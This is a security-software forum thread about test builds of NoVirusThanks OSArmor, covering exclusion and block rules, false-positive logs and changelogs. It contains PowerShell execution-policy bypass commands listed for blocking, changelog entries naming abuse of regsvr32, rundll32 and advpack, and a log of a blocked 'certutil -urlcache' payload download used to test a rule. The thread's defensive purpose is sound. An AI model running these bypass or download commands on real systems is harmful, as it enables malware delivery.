NoVirusThanks OSArmor: An Additional Layer of Defense

@bjm_

Thanks for sharing.

@siketa

Yes, still a few small things to check and it should be ready.

@Sampei Nihira

Should be fine.

@plat1098

Unfortunately the exes are not signed.

However, try this exclusion rule (safer because we check also command-line):

Code:

[%PROCESS%: C:\Users\Public\Documents\Winstep\Versions\setup.exe] [%PARENTPROCESS%: C:\Users\*\AppData\Local\Temp\is-?????.tmp\setup.tmp] [%PROCESSCMDLINE%: "C:\Users\Public\Documents\Winstep\Versions\setup.exe" /SPAWNWND=* /NOTIFYWND=* /SP /SILENT]

Or just:

Code:

[%PROCESS%: C:\Users\Public\Documents\Winstep\Versions\setup.exe] [%PARENTPROCESS%: C:\Users\*\AppData\Local\Temp\is-?????.tmp\setup.tmp]

 

Thank you for helpful replies, @mood, @novirusthanks! I add the first exclusion rule from novirusthanks in post 1426 and see how it goes.

 

this looks very promising, now I hope there is no noticeable lag when installed, will install on my test system and test away.

A request if its not already implemented, can these known powershell script restriction bypasses be blocked by osarmour?

Code:

Run the script in PowerShell_ISE by selecting all of the code and pressing F8
PowerShell.exe -ExecutionPolicy Bypass -File c:\temp\PowerShellScript.ps1
PowerShell.exe -ExecutionPolicy UNRestricted -File c:\temp\PowerShellScript.ps1
Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted

Also does anyone run this alongside HMPA with no issues?

 

With the latest build I am getting an error when accessing the "main protection" and "advanced" tab i settings. It's always the same address and same module. Different "Read of adress" every time.

 

I wish that OSArmor did not cause both my Windows 7 (64bit) systems to hang. Since the first test version of 1.4 this situation has prevailed. By comparison, my Windows XP systems have been entirely free of such problems right through to test version 46. There must be some underlying bug which awaits discovery.

 

@shadek, do you use an anti-exploit (or used the one in Win10 with some personal settings) or some other security Apps?

If yes, what if you disable all of them, still have the error?

 

I only use Windows Defender and OSA. I tried disabling all of Windows 10s native anti-exploit mechanisms but that didn't help. I'll try and re-install.

Edit: Re-installing did not work.

 

Here is a new v1.4 (pre-release) test47:
http://downloads.novirusthanks.org/files/osarmor_setup_1.4_test47.exe

*** Please do not share the download link, we will delete it when we'll release the official v1.4 ***

So far this is what's new compared to the previous pre-release:

To install it, first uninstall the previous build, then reboot (not really needed but may help), and install the new build.

Here is a screenshot:



Question:

Are you guys having alerts\FPs with the option "Block suspicious processes" (build 47)?

Please let me know in case.

@chrcol

You can create custom rules to block anything you want.

OSA can block 2 and 3 with pre-configured rules, about 4 I can add a rule for that on the next build, or you can add this on CustomBlock.db:

Code:

[%PROCESS%: *\powershell.exe] [%PROCESSCMDLINE%: *-ExecutionPolicy *UnRestricted*]

Have not tested 1 yet.

Should work fine, I recall there are a few users that use both OSA and HMPA together.

@shadek

Really strange, I have OSA running on 5 machines here (not VMs) and Configurator works fine.

I suspect, as @guest said, that there is a conflict with a WDEG rule probably.

Can you try this new build 47?

@loungehake

No hangs here (W7 Pro and W10 Pro), will try to reproduce.

 

Date/Time: 4/3/2018 4:06:49 PM
Process: [10272]C:\Windows\System32\makecab.exe
Parent: [10612]C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.15063.994_none_9e3edae32dc31172\TiWorker.exe
Rule: BlockMakecabExecution
Rule Name: Block execution of makecab.exe
Command Line: "C:\WINDOWS\system32\makecab.exe" C:\WINDOWS\Logs\CBS\CbsPersist_20180328174047.log C:\WINDOWS\Logs\CBS\CbsPersist_20180328174047.cab
Signer:
Parent Signer:
User/Domain: SYSTEM/NT AUTHORITY
Integrity Level: System

(test47 all rules checked)

 

Here is a new v1.4 (pre-release) test48:
http://downloads.novirusthanks.org/files/osarmor_setup_1.4_test48.exe

*** Please do not share the download link, we will delete it when we'll release the official v1.4 ***

So far this is what's new compared to the previous pre-release:

+ Fixed a typo on Exclusions.db and CustomBlock.db
+ New option: Block "ExecutionPolicy Unrestricted" on command-line (PowerShell)
+ Improved Prevent regsvr32.exe from loading .sct files
+ Improved Prevent rundll32.exe from using Control_RunDLL (shell32.dll)
+ Improved Block loading of .inf files via advpack.dll,LaunchINFSection
+ Improved Block "ExecutionPolicy Bypass" on command-line (PowerShell)
+ Improved Block suspicious command-lines
+ Improved Block suspicious Svchost.exe process behaviors
+ Minor fixes and optimizations
+ Fixed some false positives

To install it, first uninstall the previous build, then reboot (not really needed but may help), and install the new build.

@bjm_

FP fixed on build 48.

 

Test 48 running well here along side EAM. New builds are coming so fast that I usually just install every second build. No reboot needed.

 

Just updated to the latest build. Thanks as always!

 

In Win 10 v1803 everything looks good (and SysHardener also)



Can you add (at Advanced Tab) options for select all/Suggested Tweaks (see picture)?

 

Do you have any tools or instructions for users to use to provide the developer with system information to help identify problems?

 

+1

 

On Windows 10 1803 this release is working to expectations. Still exploring and testing fields.

 

Hi @novirusthanks ,

I just got this probable false positive when opening Chrome.

Code:

Date/Time: 5/04/2018 8:52:43 AM
Process: [10132]C:\Windows\System32\cmd.exe
Parent: [2848]C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Rule: BlockSuspiciousCmdlines
Rule Name: Block execution of suspicious command-line strings
Command Line: C:\WINDOWS\system32\cmd.exe /d /c "C:\Program Files\Norton Security\Engine\22.12.1.15\coNatHst.exe" chrome-extension://cjabmdjcfcfdmffimndhafhblfmpjdpe/ --parent-window=0 < \\.\pipe\chrome.nativeMessaging.in.250e2ef050df31bb > \\.\pipe\chrome.nativeMessaging.out.250e2ef050df31bb
Signer:
Parent Signer: Google Inc
User/Domain: David/DAVID-HP
Integrity Level: Medium
 

Thanks.

Edit: I have added it as an exclusion twice already but it gets blocked every time I open Chrome. I am sure it is related to the Norton Security Toolbar extension.

Edit 2: This exclusion worked.

Note the two "*" wildcards required.

 

("C:\Program Files\Norton Security\Engine\22.12.1.15\coNatHst.exe")
The version number might change sooner or later. To mitigate this it can be exchanged with a "*" too.

 

Great catch! Thanks as always, mood.

 

I got a fp similar to Krusty's. But mine involved Eagleget

Date/Time: 4/4/2018 8:41:48 PM
Process: [5184]C:\Windows\System32\cmd.exe
Parent: [9500]C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Rule: BlockSuspiciousCmdlines
Rule Name: Block execution of suspicious command-line strings
Command Line: C:\WINDOWS\system32\cmd.exe /d /c "C:\Program Files (x86)\EagleGet\EGMonitor.exe" chrome-extension://kaebhgioafceeldhgjmendlfhbfjefmo/ --parent-window=0 < \\.\pipe\chrome.nativeMessaging.in.b20bf05ca9fc03d3 > \\.\pipe\chrome.nativeMessaging.out.b20bf05ca9fc03d3
Signer:
Parent Signer: Google Inc
Integrity Level: Medium

 

Better enter a rule for Certutil.exe:

https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/

https://isc.sans.edu/diary/rss/23517

 

FP:
Date/Time: 4/5/2018 9:04:36 AM
Process: [4664]C:\Windows\System32\cmd.exe
Parent: [1508]C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Rule: BlockSuspiciousCmdlines
Rule Name: Block execution of suspicious command-line strings
Command Line: C:\windows\system32\cmd.exe /d /c "C:\Program Files (x86)\Siber Systems\AI RoboForm\Chrome\rf-chrome-nm-host.exe" chrome-extension://pnlccmojcmeohlpggmfnbbiapkmbliob/ --parent-window=0 < \\.\pipe\chrome.nativeMessaging.in.7570cb3ded711f33 > \\.\pipe\chrome.nativeMessaging.out.7570cb3ded711f33
Signer:
Parent Signer: Google Inc
User/Domain: Jim/Jim-PC
Integrity Level: Medium

I'm using test 48 and have excluded this FP but everytime I open chrome I still get a popup for it.

 

Here is a new v1.4 (pre-release) test49:
http://downloads.novirusthanks.org/files/osarmor_setup_1.4_test49.exe

/ /Edit: Link fixed

*** Please do not share the download link, we will delete it when we'll release the official v1.4 ***

So far this is what's new compared to the previous pre-release:

+ Improved Block execution of .wsf scripts
+ Improved Block suspicious command-lines
+ Disabled /silent and /verysilent uninstallation
+ Improved Prevent important Windows services from being disabled
+ Fixed some false positives

To install it, first uninstall the previous build, then reboot (not really needed but may help), and install the new build.

All reported FPs should be fixed.

@Sampei Nihira

Rule was added a few builds ago:

Code:

Date/Time: 06/04/2018 00:50:53
Process: [6084]C:\Windows\System32\certutil.exe
Parent: [6020]C:\Windows\System32\cmd.exe
Rule: BlockSuspiciousCmdlines
Rule Name: Block execution of suspicious command-line strings
Command Line: certutil  -urlcache -split -f http://127.0.0.1:80/payload.exe
Signer:
Parent Signer: